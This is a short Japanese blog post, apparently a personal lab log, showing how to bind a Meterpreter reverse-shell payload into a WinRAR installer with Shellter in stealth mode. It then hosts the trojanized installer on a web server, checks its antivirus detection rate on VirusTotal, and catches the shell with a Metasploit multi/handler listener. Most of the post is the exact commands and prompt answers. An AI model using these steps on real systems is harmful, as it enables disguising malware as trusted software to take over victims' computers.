ペイロードに別ファイルの結合

ペイロードに別ファイルの結合

ターゲットにペイロードを実行させても
別の画面がでてきたり
何も実行されないと不審に思われるので
ペイロードに別ファイルを結合し2つのプログラムを実行させることで
偽装させるという手法がある

これが bind
使われる手法としては
画像ファイルにペイロードが結合されていたて
画像を表示したらペイロードが実行されるというもの

あとは
トロイの木馬にゲームと結合させてゲームが起動してプレイできるが
裏ではトロイの木馬の感染処理が進むというもの

今回は KaliLinux と WIndows10 で実験

まず
WinRaR のインストーラーを取得

https://www.win-rar.com/download.html?&L=0
から32bit のものをダウンロード

cp Downloads/wrar580.exe /root/Desktop/

でファイルをデスクトップへコピーしておく

次に
Shellter のインストール

apt install shellter

次に shellter の初期設定

shellter

で起動

ここからは対話形式で設定

Choose Operation Mode - Auto/Manual (A/M/H):

となるので自動にしたいので
A

PE Target: 

で対象ファイルを選ぶので

/root/Desktop/wrar580.exe
を指定

Enable Stealth Mode? (Y/N/H):

でステルスを有効化するので Y

Use a listed payload or custom? (L/C/H):

となるので
リストから選ぶので L を選択

これでリストがでてくる
今回使うのは revrse_tpc なので

Select payload by index: 

では1を入力

次に

SET LHOST: 

となるので KaliLinux のIPを入力

次に使うポートの指定

SET LPORT: 

となるので4444を入力

最後に

Press [Enter] to continue...

となったら Enter

これで作成できたので

cp Desktop/wrar580.exe /var/www/html/share/
service apache2 restart

でペイロードがダウンロードできるようにしておく

次にウイルス検知にどれくらい引っかかるかチェック

https://www.virustotal.com/ja/
へアクセスし
Choose file をクリック

wrrar580.exeを選び調査
これで70の検知システムのうち27引っかかっているということがわかる

これでファイルは作成できたので
KaliLinux でリバースシェルの待受

msfconsole

でMetasploit を起動

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.134
set lport 4444
exploit 

で待受開始

あとは windows10 でリアルタイム保護を無効化した状態で
ブラウザで
wrrar580.exe をダウンロードし実行

これでMeterpreter セッションが確立される

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です